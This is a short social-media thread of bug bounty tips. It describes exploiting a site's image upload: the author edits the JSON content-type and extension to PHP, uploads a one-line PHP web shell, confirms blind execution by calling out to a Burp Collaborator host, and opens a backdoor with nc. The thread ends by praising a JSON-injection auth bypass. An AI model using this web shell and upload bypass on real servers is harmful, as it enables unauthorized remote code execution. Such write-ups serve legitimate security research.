#bugbountytips#bugbounty#cybersecurity#Pentesting#Hacking#bugcrowd#Hackerone#IDOR#XSS#SQLI
Blind #RCE
When you find a file upload center inside any site
You will definitely look for RCE because it is considered the most important and dangerous security vulnerability that gives you access to a server and a backdoor.
Well, I decided to upload my own picture on one of the private sites
So I got the end point of his photos, which are uploaded to the same site without the use of third-party
https://t.co/DGoZFKffrO
Therefore, I decided to send the request to the Burp
But I found the content of the image does not appear in the burp
which only appears in image format
{"content-type":"image/jpeg",
"file_ext":"jpeg"}
Where I changed it to to
{"content-type":"application/x-httpd-php",
"file_ext":"php"}
I found that the image was uploaded in .php format correctly
So I created a RCE.jpg file with the content:-
<?php system($_GET['im4x']);?>
im4x: It is the variable that we change in order to give the server commands
I also uploaded the RCE.jpg file
I intercepted the request and changed it to PHP
The site was not showing me what I was printing in the im4x variable like <whoami, ls , pwd , .. etc >
So I used a command that forces the site to visit another site (you can use Burp Collaborator)
https://t.co/bUbcSrTmRb+<Burp Collaborator>
I got a response, the link was visited, so I made sure the site accepts injections
I opened my back door easily with NC
retweet, please ❤️❤️
Love this auth bypass via JSON Injection found by
@GHSecurityLab, it's such an underrated attack class. Backslash Powered Scanner can detect JSON Injection but it takes dedication to build a real exploit black-box.
https://t.co/52Folk1Cbe